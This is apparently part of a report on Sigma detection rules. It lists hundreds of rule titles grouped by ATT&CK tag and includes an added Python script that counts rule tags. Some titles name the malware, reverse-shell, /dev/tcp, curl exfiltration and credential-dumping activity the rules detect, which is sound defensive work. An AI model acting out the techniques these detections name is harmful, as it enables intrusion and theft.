  • Potential Raspberry Robin Dot Ending File
  • Potential ACTINIUM Persistence Activity
  • FakeUpdates/SocGholish Activity
  • MERCURY APT Activity
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE
  • COLDSTEEL RAT Anonymous User Process Execution
  • COLDSTEEL RAT Cleanup Command Execution
  • COLDSTEEL RAT Service Persistence Execution
  • DarkGate - Autoit3.EXE Execution Parameters
  • DarkGate - User Created Via Net.EXE
  • Griffon Malware Attack Pattern
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
  • Potential Pikabot Discovery Activity
  • Potential Pikabot Hollowing Activity
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE
  • Qakbot Regsvr32 Calc Pattern
  • Potential Qakbot Rundll32 Execution
  • Qakbot Rundll32 Exports Execution
  • Qakbot Rundll32 Fake DLL Extension Execution
  • Qakbot Uninstaller Execution
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE
  • Rorschach Ransomware Execution Activity
  • Potential SNAKE Malware Installation CLI Arguments Indicator
  • Potential SNAKE Malware Installation Binary Indicator
  • Potential SNAKE Malware Persistence Service Execution
  • Ursnif Redirection Of Discovery Commands
  • Potential Compromised 3CXDesktopApp Execution
  • Potential Suspicious Child Process Of 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Update Activity
  • Diamond Sleet APT Process Activity Indicators
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
  • Lace Tempest Cobalt Strike Download
  • Lace Tempest Malware Loader Execution
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution
  • Mint Sandstorm - Log4J Wstomcat Process Execution
  • Mint Sandstorm - ManageEngine Suspicious Process Execution
  • Potential APT Mustang Panda Activity Against Australian Gov
  • PaperCut MF/NG Exploitation Related Indicators
  • PaperCut MF/NG Potential Exploitation
  • Peach Sandstorm APT Process Activity Indicators
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
  • CVE-2024-50623 Exploitation Attempt - Cleo
  • Potential KamiKakaBot Activity - Lure Document Execution
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
  • Kapeka Backdoor Persistence Activity
  • Kapeka Backdoor Execution Via RunDLL32.EXE
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe
  • Potential Raspberry Robin CPL Execution Activity
  • Potential APT FIN7 Exploitation Activity
  • Forest Blizzard APT - Process Creation Activity
  • Userdomain Variable Enumeration
  • Password Protected Compressed File Extraction Via 7Zip
  • Set Files as System Files Using Attrib.EXE
  • Potential BOINC Software Execution (UC-Berkeley Signature)
  • CMD Shell Output Redirect
  • Potential File Override/Append Via SET Command
  • Headless Process Launched Via Conhost.EXE
  • Dynamic .NET Compilation Via Csc.EXE - Hunting
  • File Download Via Curl.EXE
  • Curl.EXE Execution
  • Potential Data Exfiltration Via Curl.EXE
  • Diskshadow Child Process Spawned
  • Curl.EXE Execution With Custom UserAgent
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process
  • Diskshadow Script Mode Execution
  • Potential Proxy Execution Via Explorer.EXE From Shell Process
  • Potential DLL Sideloading Activity Via ExtExport.EXE
  • Potential Password Reconnaissance Via Findstr.EXE
  • New Self Extracting Package Created Via IExpress.EXE
  • Microsoft Workflow Compiler Execution
  • CodePage Modification Via MODE.COM
  • Net.EXE Execution
  • SMB over QUIC Via Net.EXE
  • Suspicious New Instance Of An Office COM Object
  • Import New Module Via PowerShell CommandLine
  • Unusually Long PowerShell CommandLine
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
  • Potentially Suspicious PowerShell Child Processes
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
  • Remote Access Tool - Ammy Admin Agent Execution
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
  • DLL Call by Ordinal Via Rundll32.EXE
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
  • Scheduled Task Creation From Potential Suspicious Parent Location
  • SC.EXE Query Execution
  • Potential CommandLine Obfuscation Using Unicode Characters
  • Potentially Suspicious Compression Tool Parameters
  • Elevated System Shell Spawned
  • EventLog Query Requests By Builtin Utilities
  • Potential Suspicious Execution From GUID Like Folder Names
  • Execution From Webserver Root Folder
  • Tunneling Tool Execution
  • File or Folder Permissions Modifications
  • Manual Execution of Script Inside of a Compressed File
  • Process Terminated Via Taskkill
  • Suspicious Tasklist Discovery Command
  • System Information Discovery Via Wmic.EXE
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
  • Arbitrary Command Execution Using WSL
  • Cab File Extraction Via Wusa.EXE
  • Silence.Downloader V3
  • Automated Turla Group Lateral Movement
  • DNSCat2 Powershell Implementation Detection Via Process Creation
  • Reconnaissance Activity Using BuiltIn Commands
  • Quick Execution of a Series of Suspicious Commands
  • MSI Spawned Cmd and Powershell Spawned Processes
  • Always Install Elevated Parent Child Correlated
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing
  • Detection of Possible Rotten Potato
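The "None" row that follows is the bucket this report uses for rules that carry no tag in the dimension being counted (the page does not state which dimension the 1002 rules below lack). The following Python is an added example, not SigmaTACT's own code, showing how such a tally is produced from Sigma `tags` lists. Its assumptions are labelled in the code: Sigma's tag conventions (`attack.<tactic_slug>`, `attack.tNNNN`, `attack.tNNNN.NNN`, with any other `attack.*` tag such as software or group IDs treated as "other"), one count per rule per distinct value, the literal key `None` for rules lacking a tag in a dimension, and a sub-technique tag not being folded into its parent technique unless asked. The sample rules are constructed, already parsed into dicts (a real run would `yaml.safe_load` each rule file), so the block runs offline.

```python
"""Tally MITRE ATT&CK tags carried by Sigma rules, in the style of the report above.

Added example, not SigmaTACT's code. Assumptions:
- Tag forms: 'attack.<tactic_slug>', 'attack.tNNNN' (technique),
  'attack.tNNNN.NNN' (sub-technique); other 'attack.*' tags (software S*,
  group G*) go to the "other" bucket; non-attack tags (cve.*, car.*) are ignored.
- A rule counts once per distinct value it carries in a dimension; a rule with
  no value in a dimension is counted under the literal key "None".
"""
import re
from collections import Counter

# The 14 ATT&CK Enterprise tactics in the slug form Sigma uses.
TACTICS = {
    "reconnaissance", "resource_development", "initial_access", "execution",
    "persistence", "privilege_escalation", "defense_evasion",
    "credential_access", "discovery", "lateral_movement", "collection",
    "command_and_control", "exfiltration", "impact",
}
SUBTECH_RE = re.compile(r"^attack\.t\d{4}\.\d{3}$")
TECH_RE = re.compile(r"^attack\.t\d{4}$")
DIMENSIONS = ("tactic", "technique", "sub_technique", "other")


def classify_tag(tag):
    """Return (dimension, normalized_tag) for one Sigma tag, or None if it is not an attack.* tag."""
    tag = tag.strip().lower()
    if not tag.startswith("attack."):
        return None                       # e.g. 'cve.2021-44228', 'car.2013-05-009'
    if SUBTECH_RE.match(tag):
        return ("sub_technique", tag)
    if TECH_RE.match(tag):
        return ("technique", tag)
    if tag[len("attack."):] in TACTICS:
        return ("tactic", tag)
    return ("other", tag)                 # attack.s0154, attack.g0016, ...


def tally(rules, fold_subtechniques=False):
    """Count rules per value in each dimension; "None" collects rules with no tag there.

    fold_subtechniques=True also credits the parent technique of every sub-technique tag
    (assumption: whether the report does this is not stated on the page).
    """
    counts = {d: Counter() for d in DIMENSIONS}
    members = {d: {} for d in DIMENSIONS}   # value -> list of rule titles
    for rule in rules:
        seen = {d: set() for d in DIMENSIONS}
        for tag in rule.get("tags") or []:  # handles a missing or null tags key
            hit = classify_tag(tag)
            if hit is None:
                continue
            dim, value = hit
            seen[dim].add(value)
            if fold_subtechniques and dim == "sub_technique":
                seen["technique"].add(value.rsplit(".", 1)[0])
        for dim in DIMENSIONS:
            for value in seen[dim] or {"None"}:
                counts[dim][value] += 1
                members[dim].setdefault(value, []).append(rule["title"])
    return counts, members


def top_rows(counter):
    """Rows for a 'Top ...' table: (value, count) sorted by count desc, then name."""
    return sorted(counter.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample input (hypothetical titles and tags, not real Sigma rules).
SAMPLE_RULES = [
    {"title": "Sample - LOLBin Proxy Execution",
     "tags": ["attack.defense_evasion", "attack.execution", "attack.t1218.011", "attack.t1218"]},
    {"title": "Sample - C2 Beacon Profile",
     "tags": ["attack.command_and_control", "attack.t1071.001", "attack.s0154"]},
    {"title": "Sample - Exploit Attempt",
     "tags": ["attack.initial_access", "attack.t1190", "cve.2021-44228"]},
    {"title": "Sample - Cloud Audit Change",
     "tags": ["attack.defense_evasion"]},
    {"title": "Sample - Untagged Rule"},
]


def main():
    counts, members = tally(SAMPLE_RULES)
    for dim in DIMENSIONS:
        print(f"== {dim} ==")
        for value, n in top_rows(counts[dim]):
            print(f"{value} {n}")
            for title in members[dim][value]:
                print(f"  - {title}")


if __name__ == "__main__":
    main()
```

Rules that land under `None` for the tactic dimension are the ones worth reviewing first: a detection with no tactic mapping cannot be placed in coverage views like the table above, so the bucket doubles as a hygiene list for rule authors.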
None 1002
  • App Permissions Granted For Other APIs
  • Edit of .bash_profile and .bashrc
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd
  • Brute Force
  • Domestic Kitten FurBall Malware Pattern
  • CobaltStrike Malleable Amazon Browsing Traffic Profile
  • CobaltStrike Malformed UAs in Malleable Profiles
  • CobaltStrike Malleable (OCSP) Profile
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile
  • iOS Implant URL Pattern
  • Search-ms and WebDAV Suspicious Indicators in URL
  • Suspicious PowerShell Download
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Accessing WinAPI in PowerShell for Credentials Dumping
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon
  • Windows Defender Threat Detection Disabled
  • Lateral Movement Indicator ConDrv
  • Security Event Log Cleared
  • Group Modification Logging
  • Correct Execution of Nltest.exe
  • New Service Uses Double Ampersand in Path
  • SAM Dump to AppData
  • Kubernetes CronJob/Job Modification
  • Kubernetes Admission Controller Modification
  • Kubernetes Rolebinding Modification
  • Kubernetes Secrets Modified or Deleted
  • Kubernetes Unauthorized or Unauthenticated Access
  • Antivirus Exploitation Framework Detection
  • Antivirus Hacktool Detection
  • Antivirus Password Dumper Detection
  • Antivirus Ransomware Detection
  • Antivirus Web Shell Detection
  • Antivirus Relevant File Paths Alerts
  • Suspicious SQL Query
  • AWS Attached Malicious Lambda Layer
  • AWS CloudTrail Important Change
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
  • New Network ACL Entry Added
  • New Network Route Added
  • Ingress/Egress Security Group Modification
  • LoadBalancer Security Group Modification
  • RDS Database Security Group Modification
  • Potential Malicious Usage of CloudTrail System Manager
  • AWS Config Disabling Channel/Recorder
  • AWS Console GetSigninToken Potential Abuse
  • SES Identity Has Been Deleted
  • AWS SAML Provider Deletion Activity
  • AWS S3 Bucket Versioning Disable
  • AWS Key Pair Import Activity
  • AWS EC2 Disable EBS Encryption
  • AWS EC2 Startup Shell Script Change
  • AWS EC2 VM Export Failure
  • AWS ECS Task Definition That Queries The Credential Endpoint
  • AWS EFS Fileshare Modified or Deleted
  • AWS EFS Fileshare Mount Modified or Deleted
  • AWS EKS Cluster Created or Deleted
  • AWS ElastiCache Security Group Created
  • AWS ElastiCache Security Group Modified or Deleted
  • Potential Bucket Enumeration on AWS
  • AWS GuardDuty Important Change
  • AWS IAM Backdoor Users Keys
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation
  • AWS IAM S3Browser LoginProfile Creation
  • AWS IAM S3Browser User or AccessKey Creation
  • New AWS Lambda Function URL Configuration Created
  • AWS Glue Development Endpoint Activity
  • AWS RDS Master Password Change
  • Modification or Deletion of an AWS RDS Cluster
  • Restore Public AWS RDS Instance
  • AWS Root Credentials
  • AWS Route 53 Domain Transfer Lock Disabled
  • AWS Route 53 Domain Transferred to Another Account
  • AWS S3 Data Management Tampering
  • AWS SecurityHub Findings Evasion
  • AWS Snapshot Backup Exfiltration
  • AWS Identity Center Identity Provider Change
  • AWS STS AssumeRole Misuse
  • AWS STS GetSessionToken Misuse
  • AWS Suspicious SAML Activity
  • AWS User Login Profile Was Modified
  • Azure Active Directory Hybrid Health AD FS New Server
  • Azure Active Directory Hybrid Health AD FS Service Delete
  • User Added to an Administrator's Azure AD Role
  • Azure Application Deleted
  • Azure Application Gateway Modified or Deleted
  • Azure Application Security Group Modified or Deleted
  • Azure Application Credential Modified
  • Azure Container Registry Created or Deleted
  • Number Of Resource Creation Or Deployment Activities
  • Azure Device No Longer Managed or Compliant
  • Azure Device or Configuration Modified or Deleted
  • Azure DNS Zone Modified or Deleted
  • Azure Firewall Modified or Deleted
  • Azure Firewall Rule Collection Modified or Deleted
  • Granting Of Permissions To An Account
  • Azure Keyvault Key Modified or Deleted
  • Azure Key Vault Modified or Deleted
  • Azure Keyvault Secrets Modified or Deleted
  • Azure Kubernetes Admission Controller
  • Azure Kubernetes Cluster Created or Deleted
  • Azure Kubernetes CronJob
  • Azure Kubernetes Events Deleted
  • Azure Kubernetes Network Policy Change
  • Azure Kubernetes Pods Deleted
  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted
  • Azure Kubernetes Sensitive Role Access
  • Azure Kubernetes Secret or Config Object Access
  • Azure Kubernetes Service Account Modified or Deleted
  • Disabled MFA to Bypass Authentication Mechanisms
  • Azure Network Firewall Policy Modified or Deleted
  • Azure Point-to-site VPN Modified or Deleted
  • Azure Firewall Rule Configuration Modified or Deleted
  • Azure Network Security Configuration Modified or Deleted
  • Azure Virtual Network Device Modified or Deleted
  • Azure New CloudShell Created
  • Azure Owner Removed From Application or Service Principal
  • Rare Subscription-level Operations In Azure
  • Azure Service Principal Created
  • Azure Service Principal Removed
  • Azure Subscription Permission Elevation Via ActivityLogs
  • Azure Suppression Rule Created
  • Azure Virtual Network Modified or Deleted
  • Azure VPN Connection Modified or Deleted
  • CA Policy Removed by Non Approved Actor
  • CA Policy Updated by Non Approved Actor
  • New CA Policy by Non-approved Actor
  • Bitlocker Key Retrieval
  • Account Created And Deleted Within A Close Time Frame
  • Certificate-Based Authentication Enabled
  • Changes to Device Registration Policy
  • Guest Users Invited To Tenant By Non Approved Inviters
  • New Root Certificate Authority Added
  • Users Added to Global or Device Admin Roles
  • Application AppID Uri Configuration Changes
  • Added Credentials to Existing Application
  • Delegated Permissions Granted For All Users
  • End User Consent
  • End User Consent Blocked
  • Added Owner To Application
  • App Granted Microsoft Permissions
  • App Granted Privileged Delegated Or App Permissions
  • App Assigned To Azure RBAC/Microsoft Entra Role
  • Application URI Configuration Changes
  • Windows LAPS Credential Dump From Entra ID
  • Change to Authentication Method
  • Azure Domain Federation Settings Modified
  • User Added To Group With CA Policy Modification Access
  • User Removed From Group With CA Policy Modification Access
  • Guest User Invited By Non Approved Inviters
  • User State Changed From Guest To Member
  • PIM Approvals And Deny Elevation
  • PIM Alert Setting Changes To Disabled
  • Changes To PIM Settings
  • User Added To Privilege Role
  • Bulk Deletion Changes To Privileged Account Permissions
  • Privileged Account Creation
  • Azure Subscription Permission Elevation Via AuditLogs
  • Temporary Access Pass Added To An Account
  • User Risk and MFA Registration Policy Updated
  • Multi Factor Authentication Disabled For User Account
  • Password Reset By User Account
  • Anomalous Token
  • Anomalous User Activity
  • Activity From Anonymous IP Address
  • Anonymous IP Address
  • Atypical Travel
  • Impossible Travel
  • Suspicious Inbox Forwarding Identity Protection
  • Suspicious Inbox Manipulation Rules
  • Azure AD Account Credential Leaked
  • Malicious IP Address Sign-In Failure Rate
  • Malicious IP Address Sign-In Suspicious
  • Sign-In From Malware Infected IP
  • Password Spray Activity
  • Primary Refresh Token Access Attempt
  • Suspicious Browser Activity
  • Azure AD Threat Intelligence
  • SAML Token Issuer Anomaly
  • New Country
  • Unfamiliar Sign-In Properties
  • Stale Accounts In A Privileged Role
  • Invalid PIM License
  • Roles Assigned Outside PIM
  • Roles Activation Doesn't Require MFA
  • Roles Activated Too Frequently
  • Roles Are Not Being Used
  • Too Many Global Admins
  • Account Lockout
  • Successful Authentications From Countries You Do Not Operate Out Of
  • Increased Failed Authentications Of Any Type
  • Measurable Increase Of Successful Authentications
  • Authentications To Important Apps Using Single Factor Authentication
  • Discovery Using AzureHound
  • Failed Authentications From Countries You Do Not Operate Out Of
  • Device Registration or Join Without MFA
  • Azure AD Only Single Factor Authentication Required
  • Suspicious SignIns From A Non Registered Device
  • Sign-ins from Non-Compliant Devices
  • Sign-ins by Unknown Devices
  • Potential MFA Bypass Using Legacy Client Authentication
  • Application Using Device Code Authentication Flow
  • Applications That Are Using ROPC Authentication Flow
  • Account Disabled or Blocked for Sign in Attempts
  • Sign-in Failure Due to Conditional Access Requirements Not Met
  • Use of Legacy Authentication Protocols
  • Login to Disabled Account
  • Multifactor Authentication Denied
  • Azure Unusual Authentication Interruption
  • Multifactor Authentication Interrupted
  • Users Authenticating To Other Azure AD Tenants
  • User Access Blocked by Azure Conditional Access
  • Bitbucket Full Data Export Triggered
  • Bitbucket Global Permission Changed
  • Bitbucket Global Secret Scanning Rule Deleted
  • Bitbucket Global SSH Settings Changed
  • Bitbucket Audit Log Configuration Updated
  • Bitbucket Project Secret Scanning Allowlist Added
  • Bitbucket Secret Scanning Exempt Repository Added
  • Bitbucket Secret Scanning Rule Deleted
  • Bitbucket Unauthorized Access To A Resource
  • Bitbucket Unauthorized Full Data Export Triggered
  • Bitbucket User Details Export Attempt Detected
  • Bitbucket User Login Failure
  • Bitbucket User Login Failure Via SSH
  • Bitbucket User Permissions Export Attempt
  • Cisco Duo Successful MFA Authentication Via Bypass Code
  • GCP Access Policy Deleted
  • GCP Break-glass Container Workload Deployed
  • Google Cloud Storage Buckets Enumeration
  • Google Cloud Storage Buckets Modified or Deleted
  • Google Cloud Re-identifies Sensitive Information
  • Google Cloud DNS Zone Modified or Deleted
  • Google Cloud Firewall Modified or Deleted
  • Google Full Network Traffic Packet Capture
  • Google Cloud Kubernetes Admission Controller
  • Google Cloud Kubernetes CronJob
  • Google Cloud Kubernetes RoleBinding
  • Google Cloud Kubernetes Secrets Modified or Deleted
  • Google Cloud Service Account Disabled or Deleted
  • Google Cloud Service Account Modified
  • Google Cloud SQL Database Modified or Deleted
  • Google Cloud VPN Tunnel Modified or Deleted
  • Google Workspace Application Access Level Modified
  • Google Workspace Application Removed
  • Google Workspace Granted Domain API Access
  • Google Workspace MFA Disabled
  • Google Workspace Role Modified or Deleted
  • Google Workspace Role Privilege Deleted
  • Google Workspace User Granted Admin Privileges
  • Github Delete Action Invoked
  • Outdated Dependency Or Vulnerability Alert Disabled
  • Github High Risk Configuration Disabled
  • Github Fork Private Repositories Setting Enabled/Cleared
  • New Github Organization Member Added
  • Github New Secret Created
  • Github Outside Collaborator Detected
  • Github Push Protection Bypass Detected
  • Github Push Protection Disabled
  • Github Repository/Organization Transferred
  • Github Secret Scanning Feature Disabled
  • Github Self Hosted Runner Changes Detected
  • Github SSH Certificate Configuration Changed
  • Azure Login Bypassing Conditional Access Policies
  • Disabling Multi Factor Authentication
  • New Federated Domain Added
  • New Federated Domain Added - Exchange
  • Activity from Suspicious IP Addresses
  • Activity Performed by Terminated User
  • Activity from Anonymous IP Addresses
  • Data Exfiltration to Unsanctioned Apps
  • Activity from Infrequent Country
  • Microsoft 365 - Impossible Travel Activity
  • Logon from a Risky IP Address
  • Microsoft 365 - Potential Ransomware Activity
  • PST Export Alert Using eDiscovery Alert
  • PST Export Alert Using New-ComplianceSearchAction
  • Suspicious Inbox Forwarding
  • Suspicious OAuth App File Download Activities
  • Microsoft 365 - Unusual Volume of File Deletion
  • Microsoft 365 - User Restricted from Sending Email
  • Okta Admin Functions Access Through Proxy
  • Okta Admin Role Assigned to an User or Group
  • Okta Admin Role Assignment Created
  • Okta API Token Created
  • Okta API Token Revoked
  • Okta Application Modified or Deleted
  • Okta Application Sign-On Policy Modified or Deleted
  • Okta FastPass Phishing Detection
  • Okta Identity Provider Created
  • Okta Network Zone Deactivated or Deleted
  • Okta MFA Reset or Deactivated
  • Okta New Admin Console Behaviours
  • Potential Okta Password in AlternateID Field
  • Okta Policy Rule Modified or Deleted
  • Okta Policy Modified or Deleted
  • Okta Security Threat Detected
  • Okta Suspicious Activity Reported by End-user
  • Okta Unauthorized Access to App
  • Okta User Account Locked Out
  • New Okta User Created
  • Okta User Session Start Via An Anonymising Proxy Service
  • OneLogin User Assumed Another User
  • OneLogin User Account Locked
  • Default Credentials Usage
  • Host Without Firewall
  • Cleartext Protocol Usage Via Netflow
  • Audio Capture
  • Auditing Configuration Changes on Linux Host
  • Binary Padding - Linux
  • BPFDoor Abnormal Process ID or Lock File Accessed
  • Bpfdoor TCP Ports Redirect
  • Linux Capabilities Discovery
  • File Time Attribute Change - Linux
  • Remove Immutable File Attribute - Auditd
  • Clipboard Collection with Xclip Tool - Auditd
  • Clipboard Collection of Image Data with Xclip Tool
  • Possible Coin Miner CPU Priority Param
  • Creation Of An User Account
  • Data Compressed
  • Data Exfiltration with Wget
  • Overwriting the File with Dev Zero or Null
  • Disable System Firewall
  • File or Folder Permissions Change
  • Credentials In Files - Linux
  • Use Of Hidden Paths Or Files
  • Hidden Files and Directories
  • Steganography Hide Zip Information in Picture File
  • Linux Keylogging with Pam.d
  • Modification of ld.so.preload
  • Loading of Kernel Module via Insmod
  • Logging Configuration Changes on Linux Host
  • Masquerading as Linux Crond Process
  • Modify System Firewall
  • Linux Network Service Scanning - Auditd
  • Network Sniffing - Linux
  • Password Policy Discovery - Linux
  • Systemd Service Reload or Start
  • Screen Capture with Import Tool
  • Screen Capture with Xwd
  • Split A File Into Pieces - Linux
  • Steganography Hide Files with Steghide
  • Steganography Extract Files with Steghide
  • Suspicious C2 Activities
  • Suspicious Commands Linux
  • Program Executions in Suspicious Folders
  • Suspicious History File Operations - Linux
  • Systemd Service Creation
  • System Information Discovery - Auditd
  • System and Hardware Information Discovery
  • System Shutdown/Reboot - Linux
  • Unix Shell Configuration Modification
  • Steganography Unzip Hidden Information From Picture File
  • System Owner or User Discovery - Linux
  • Webshell Remote Command Execution
  • Equation Group Indicators
  • Buffer Overflow Attempts
  • Commands to Clear or Remove the Syslog - Builtin
  • Remote File Copy
  • Code Injection by ld.so Preload
  • Nimbuspwn Exploitation
  • Potential Suspicious BPF Activity - Linux
  • Shellshock Expression
  • Privileged User Has Been Created
  • Linux Command History Tampering
  • Suspicious Activity in Shell Commands
  • Suspicious Log Entries
  • Suspicious Reverse Shell Command Line
  • Space After Filename
  • Suspicious Use of /dev/tcp
  • JexBoss Command Sequence
  • Symlink Etc Passwd
  • PwnKit Local Privilege Escalation
  • Relevant ClamAV Message
  • Modifying Crontab
  • Guacamole Two Users Sharing Session Anomaly
  • SSHD Error Message CVE-2018-15473
  • Suspicious OpenSSH Daemon Error
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin
  • Disabling Security Tools - Builtin
  • Suspicious Named Error
  • Suspicious VSFTPD Error Messages
  • Cisco Clear Logs
  • Cisco Collect Data
  • Cisco Crypto Commands
  • Cisco Disabling Logging
  • Cisco Discovery
  • Cisco Denial of Service
  • Cisco File Deletion
  • Cisco Show Commands Input
  • Cisco Local Accounts
  • Cisco Modify Configuration
  • Cisco Stage Data
  • Cisco Sniffing
  • Cisco BGP Authentication Failures
  • Cisco LDP Authentication Failures
  • DNS Query to External Service Interaction Domains
  • Cobalt Strike DNS Beaconing
  • Monero Crypto Coin Mining Pool Lookup
  • Suspicious DNS Query with B64 Encoded String
  • Telegram Bot API Request
  • DNS TXT Answer with Possible Execution Strings
  • Wannacry Killswitch Domain
  • Cleartext Protocol Usage
  • Huawei BGP Authentication Failures
  • Juniper BGP Missing MD5
  • MITRE BZAR Indicators for Execution
  • MITRE BZAR Indicators for Persistence
  • Potential PetitPotam Attack Via EFS RPC Calls
  • Possible PrintNightmare Print Driver Install
  • SMB Spoolss Name Piped Usage
  • Default Cobalt Strike Certificate
  • DNS Events Related To Mining Pools
  • New Kind of Network (NKN) Detection
  • Suspicious DNS Z Flag Bit Set
  • DNS TOR Proxies
  • Executable from Webdav
  • OMIGOD HTTP No Authentication RCE
  • WebDav Put Request
  • Publicly Accessible RDP Service
  • Remote Task Creation via ATSVC Named Pipe - Zeek
  • Possible Impacket SecretDump Remote Activity - Zeek
  • First Time Seen Remote Named Pipe - Zeek
  • Suspicious PsExec Execution - Zeek
  • Suspicious Access to Sensitive File Extensions - Zeek
  • Transferring Files with Credential Data via Network Shares - Zeek
  • Kerberos Network Traffic RC4 Ticket Encryption
  • Apache Segmentation Fault
  • Apache Threading Error
  • Nginx Core Dump
  • Download from Suspicious Dyndns Hosts
  • Windows WebDAV User Agent
  • Download From Suspicious TLD - Blacklist
  • Download From Suspicious TLD - Whitelist
  • F5 BIG-IP iControl Rest API Command Execution - Proxy
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy
  • HackTool - BabyShark Agent Default URL Pattern
  • HackTool - Empire UserAgent URI Combo
  • PUA - Advanced IP/Port Scanner Update Check
  • PwnDrp Access
  • Raw Paste Service Access
  • Flash Player Update from Suspicious Location
  • Suspicious Network Communication With IPFS
  • Telegram API Access
  • APT User Agent
  • Suspicious Base64 Encoded User-Agent
  • Bitsadmin to Uncommon IP Server Address
  • Bitsadmin to Uncommon TLD
  • Crypto Miner User Agent
  • HTTP Request With Empty User Agent
  • Exploit Framework User Agent
  • Hack Tool User Agent
  • Malware User Agent
  • Windows PowerShell User Agent
  • Rclone Activity via Proxy
  • Suspicious User Agent
  • Potential Base64 Encoded User-Agent
  • Suspicious External WebDAV Execution
  • F5 BIG-IP iControl Rest API Command Execution - Webserver
  • Successful IIS Shortname Fuzzing Scan
  • Java Payload Strings
  • JNDIExploit Pattern
  • Path Traversal Exploitation Attempts
  • Source Code Enumeration Detection by Keyword
  • SQL Injection Strings In URI
  • Server Side Template Injection Strings
  • Suspicious User-Agents Related To Recon Tools
  • Suspicious Windows Strings In URI
  • Webshell ReGeorg Detection Via Web Logs
  • Windows Webshell Strings
  • Cross Site Scripting Strings
  • Mimikatz Use
  • Microsoft Malware Protection Engine Crash
  • Potential Credential Dumping Via WER - Application
  • Ntdsutil Abuse
  • Dump Ntds.dit To Suspicious Location
  • Audit CVE Event
  • Backup Catalog Deleted
  • Application Uninstalled
  • Restricted Software Access By SRP
  • MSI Installation From Suspicious Locations
  • MSI Installation From Web
  • Atera Agent Installation
  • MSSQL Add Account To Sysadmin Role
  • MSSQL Disable Audit Settings
  • MSSQL Server Failed Logon
  • MSSQL Server Failed Logon From External Network
  • MSSQL SPProcoption Set
  • MSSQL XPCmdshell Suspicious Execution
  • MSSQL XPCmdshell Option Change
  • Relevant Anti-Virus Signature Keywords In Application Log
  • Remote Access Tool - ScreenConnect Command Execution
  • Remote Access Tool - ScreenConnect File Transfer
  • Microsoft Malware Protection Engine Crash - WER
  • File Was Not Allowed To Run
  • Sysinternals Tools AppX Versions Execution
  • Deployment AppX Package Was Blocked By AppLocker
  • Potential Malicious AppX Package Installation Attempts
  • Deployment Of The AppX Package Was Blocked By The Policy
  • Suspicious AppX Package Installation Attempt
  • Suspicious Remote AppX Package Locations
  • Suspicious AppX Package Locations
  • Uncommon AppX Package Locations
  • Suspicious Digital Signature Of AppX Package
  • New BITS Job Created Via Bitsadmin
  • New BITS Job Created Via PowerShell
  • BITS Transfer Job Downloading File Potential Suspicious Extension
  • BITS Transfer Job Download From File Sharing Domains
  • BITS Transfer Job Download From Direct IP
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD
  • BITS Transfer Job Download To Potential Suspicious Folder
  • Certificate Private Key Acquired
  • Certificate Exported From Local Certificate Store
  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation
  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate
  • CodeIntegrity - Revoked Kernel Driver Loaded
  • CodeIntegrity - Blocked Image Load With Revoked Certificate
  • CodeIntegrity - Revoked Image Loaded
  • CodeIntegrity - Unsigned Kernel Module Loaded
  • CodeIntegrity - Unsigned Image Loaded
  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module
  • Loading Diagcab Package From Remote Path
  • DNS Query for Anonfiles.com Domain - DNS Client
  • DNS Query To MEGA Hosting Website - DNS Client
  • DNS Query To Put.io - DNS Client
  • Query Tor Onion Address - DNS Client
  • DNS Query To Ufile.io - DNS Client
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client
  • Failed DNS Zone Transfer
  • DNS Server Error Failed Loading the ServerLevelPluginDLL
  • USB Device Plugged
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE
  • All Rules Have Been Deleted From The Windows Firewall Configuration
  • A Rule Has Been Deleted From The Windows Firewall Exception List
  • The Windows Defender Firewall Service Failed To Load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration
  • Windows Firewall Settings Have Been Changed
